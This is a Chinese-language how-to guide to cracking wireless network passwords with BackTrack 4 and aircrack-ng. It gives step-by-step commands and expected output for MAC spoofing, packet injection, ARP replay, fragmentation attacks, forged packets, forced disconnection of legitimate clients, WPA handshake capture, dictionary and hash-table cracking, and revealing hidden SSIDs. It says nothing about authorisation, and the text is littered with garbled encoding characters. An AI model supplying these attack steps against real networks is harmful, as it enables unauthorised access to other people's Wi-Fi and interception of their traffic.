1.下載光盤版BT4.iso,copy其中的boot和bt4到U盤,windows下運行bootinst.bat安裝到U盤。VM版的BT4 可能對集成的無線網(wǎng)卡支
持不太好�����,USB無線網(wǎng)卡則支持得很好����。
或者用硬盤啟動方式:下載光盤版BT4.iso,解壓其中的boot和bt4到D盤根目錄,下載grub4dos,解壓其中的grldr、 menu.lst����、
grldr.mbr,放C盤根目錄下
編輯bcd:
bcdedit /create /d "Grub" /application bootsector
回顯: 項 {5e098857-4818-11de-b43e-001eec90feb6} 成功創(chuàng)建�����。
接著用下面的指令來設置引導參數(shù),{id}替換為上面回顯的ID���,建議用復制粘貼
bcdedit /set {id} device boot
bcdedit /set {id} path \grldr.mbr
bcdedit /displayorder {id} /addlast
設置等待時間
bcdedit /timeout 5
(
如果要卸載��,運行
bcdedit
查看Grub的{id}后�����,
bcdedit /delete {id}
)
2.啟動BT4�����,選console控制臺模式�,用戶名root,密碼toor<注意不是root>,再運行sta盤盤rtx啟動窗口模 式。
另:BT4啟動黑屏問題解決辦法
輸入root toor 登錄系統(tǒng)后在輸入 fixvesa 然后 startx如果不行就輸入 fixvmware,然后輸入startx.還是不能就輸入Xorg -
configure 然后startx
我的筆記本產(chǎn)U盤啟動BT4����,startx時按住空格可以進入.。
問題:我在啟動bt3 的時候�,輸入startx黑屏
解答:在輸入用戶名root 和密碼toor 以后輸入xconf 這時會黑屏一會,然后出來提示符再輸入startx 可進入
win窗口�;當實在不能進入win窗口的時候你也可以直接在提示符下輸入各破解命令,同時可用alt+f1 打開
一個shell���,alt+f2 打開第二個shell����,alt+f3 打開第三個等�。關閉窗口用PRINT SCREEN 鍵
---------------------end---------------------
[] 可選
<> 回顯
/ 或者
() 提示
---------------------WEP---------------------
shell 1:----------------------------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
[
macchanger -m 00:11:22:33:44:55 wlan0
<修改自己網(wǎng)卡的MAC 地址。當對方設置了MAC 地址過濾時或為了方便后面輸入>
]
2.ifconfig -a wlan0 up
(5100可能要加載網(wǎng)卡才支持注入?)
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是頻道)
另一說5100要支持注入用airmon-ng start wlan0
如果這里回顯<(monitor mode enabled)> 則下面命令所有端口號要用"wlan0"
[
aireplay-ng -9 mon0 / aireplay-ng --test mon0
<Injection is working/No anwser>(注入攻擊成功/不成功)
(檢測你的網(wǎng)卡是否支持注入)
]
4.airodump-ng -w pack -c 6 mon0/wlan0
(pack是隨便起的獲取的ivs的保存文件的名字)
另一說用airodump-ng --ivs -w pack -c 6 mon0/wlan0
shell 2:----------------------------------------
一�����、有客戶端:
破解:abcd四種方式
a.合法客戶端產(chǎn)生大量有效的數(shù)據(jù)���,能直接獲得大量cap�����。
收到10000以上data后�����,直接轉(zhuǎn)shell 3,破解密碼
b.合法客戶端只能產(chǎn)生少量數(shù)據(jù)�,就需要注入<-3>攻擊加速產(chǎn)生大量數(shù)據(jù)���。
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客戶端mac) mon0/wlan0(wlan0測試不行)
<Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多類似行>
c.合法客戶端不在通信��,注入模式不成功�,
用-0 沖突模式強制斷開合法客戶端和ap連接����,使之重新連接,
新連接所產(chǎn)生的握手數(shù)據(jù)讓-3 獲得有效的ARP從而完成ARP注入
5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客戶端mac) wlan0
6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客戶端mac) wlan0
(可能要另開窗)
d.有客戶端����,并且客戶端能產(chǎn)生有效arp 數(shù)據(jù)的另類破解方式
輸入modprobe –r iwl3945
(加載網(wǎng)卡)
輸入modprobe ipwraw
輸入airmon-ng start wlan0 6
現(xiàn)在,只要一個命令就搞定�,輸入:
輸入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>����。
<key: 12:34:56:78:90>
二����、無客戶端:
5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0
(我成功了)
另一說用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0
<Authentication successful>
<Association successful>
(建立虛擬偽裝連接)
如果失敗可嘗試降低網(wǎng)卡速率后再試:iwconfig mon0 rate 2M(注意大寫)
破解:abcd四種方式
a.-2 crack mode ---------------
建立虛擬連接后直接用-2交互攻擊模式集合了抓包,提數(shù)據(jù)和發(fā)包攻擊
6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0
發(fā)包成功后可得到足夠的ivs����,然后用aircrack-ng破解
b.-3 crack mode ---------------
6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0
7.用aircrack-ng破解<自己添加的步驟?>
c.-4 crack mode ---------------
-4攻擊模式;制造數(shù)據(jù)包���;-2交互式攻擊模式
6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0
<?yes>
<Saving keystream in replay_dec-0523-075615.xor>
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp
(提取上面xor 文件來偽造一個arp包)
8.aireplay-ng -2 -r myarp mon0
一說用aireplay-ng -2 -r myarp -x 512 mon0
(發(fā)現(xiàn)了可利用的myarp的數(shù)據(jù)包����,按y后����,立刻注入攻擊。Date瘋漲)
9.用aircrack-ng破解
d.-5 crack mode ---------------
-5碎片攻擊模式���;制造數(shù)據(jù)包���;-2交互式攻擊模式
(我成功過)
6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0
<?yes>
<Saving keystream in fragment-1216-201426.xor>
(利用-5 碎片攻擊模式獲得一個可用的包含密鑰是數(shù)據(jù)文件(xor 文件))
7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp
(Myarp隨便起的文件名)
<Wrote packet to: myarp>
8.aireplay-ng -2 -r myarp -x 256/512 mon0
<?yes>
(這時�,前面的抓包窗口上的data 將迅速增加)
(512是攻擊速度���,1024是最大值)
9.采用aircrack-ng 來進行破解
shell 3:----------------------------------------
aircrack-ng *.cap
如果shell 1用了--ivs 參數(shù)�����,則這里用aircrack-ng *.ivs
(我成功了)
另一說用aircrack-ng -n 64 -b APmac pack-01.cap
<KEY FOUND! [......] <ASCII:XXXXX>>
附:
5100用BT4+spoonwep2破解
1.把spoonwep2放在BT4\modules\下,啟動BT4
2.
ln -fs bash /bin/sh
ls -al /bin/sh
<顯示bash為成功,dash為失敗>
3.開spoonwep2,里面可以找到網(wǎng)卡了,選wlan0進入搜索����,但這時不會搜出來什么,
關閉一下spoonwep2再重啟spoonwep2���,
這時網(wǎng)卡項里有一個mon0的�����,選mon0,driver選normal,mode選unknow victim,選定PO841 replay attack����,點擊launch后就等待密
碼的出來(sata數(shù)據(jù)包到30000個左右)�。
(注:論壇中的高手說spoonwep2支持5100AGN網(wǎng)卡注入式破解)
---------------------end---------------------
---------------------WPA---------------------
1.ifconfig -a
<wlan0 ... xx:xx:xx:xx:xx:xx>
2.ifconfig -a wlan0 up
3.airmon-ng start wlan0 6
<monitor mode enabled on mon0>
(6是頻道)
4.airodump-ng -w 12345 -c 6 mon0/wlan0
(保存名為12345.cap)
(-w:寫入文件,-c:截取cap的頻道)
5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0
或者輸入:aireplay-ng -0 10 -a (ap mac) -c (合法客戶端mac) mon0/wlan0(wlan0可能不對)
<18:56:20 Sending 64 directed DeAuth,... 一些類似行>
(-c后面為合法無線客戶端的MAC地址)
(迫使AP重新與已連接的合法客戶端重新握手驗證)
(攻擊幾次后可以做破解嘗試�。WPA破解不用等到數(shù)據(jù)Data 達到幾萬�,
因為它只要一個包含WPA握手驗證包就可以了)
Cap數(shù)據(jù)包破解:
a.暴力破解
6.aircrack-ng -x -f 2 12345*.cap
另一說是用aircrack-ng -z -b (ap mac) 12345*.cap
b.字典破解
6.aircrack-ng -w password.txt 12345*.cap
另一說是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap
(
-w:是字典破解模式
Password.txt是你事先準備好的字典���。
技巧:可以在windows 下使用下載的字典工具生產(chǎn)字典����,再在BackTrack3 下拷貝到/root 下(aircrack 默認
的工作目錄在/root)����。
請注意,破解WPA 密碼的時間取決于密碼難易程度����,字典包含程度,內(nèi)存及CPU 等����。多則數(shù)小時。
)
c.把CAP數(shù)據(jù)包拷貝出來在WIN下用WinAircrack 破解
啟動WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap
Wpa-)Dictionary file-)pswd.txt,點右下角Aircrack the key...
<Key Found! [xxxxxxxx]>
d.HASH破解
6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小寫)
(Windows版本操作步驟與其Linux下版本完全一致)
(
參數(shù)解釋:
-f 這里跟上采用的字典
-d 生成的Table文件名稱
-s 目標AP的ESSID
)
7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK
(
參數(shù)解釋:
-d 導入WPA PMK Hash Table文件名稱�����,下圖中為dlink-birth.hash
-r 事先捕獲的WPA握手數(shù)據(jù)包
-s 目標AP的ESSID
)
---------------------end---------------------
WPA破解�����,怎么知道有握手包被截獲?
airodump-ng監(jiān)視窗右上角有提示:
...... WPA handshake: 00:90:4c:8e:00:65
BT4抓包后�����,cap文件保存在哪����?
輸入ls可以看到啊,默認在root下�����。
如何獲得合法端mac�?
windows下可以使用OmniPeek、Wireshark�����、Ethereal��、Aircrack-ng for Windows等工具實現(xiàn)對客戶端MAC的攔截��,Linux可用
Kismet����、Aircrack-ng中的airodump-ng等來實現(xiàn)�。需要注意的是�,若目標網(wǎng)絡采用WEP或者WPA加密的話,有時需先行破 解再對數(shù)據(jù)
包解密方可看到客戶端MAC�����。
前面第一個shell�����,如下若有station顯示,bb:bb:bb:bb:bb:bb就是合法客戶端mac
BSSID STATION ...
aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb
如何查找隱藏的SSID���?
1.在BT4下先打開一個shell,輸入
airodump-ng 網(wǎng)卡端口
2.打開另一個shell,輸入
aireplay-ng -0 10 -a AP'MAC -c 合法客戶端'MAC 網(wǎng)卡端口
可能這個命令由于頻道不對會出錯,這時就要多重輸幾次(如果不行,就是不是合法客戶端,要再試其它的客戶端),直到提示成功為止
3.然后就可以在上個shell,看到顯示出來的SSID����。
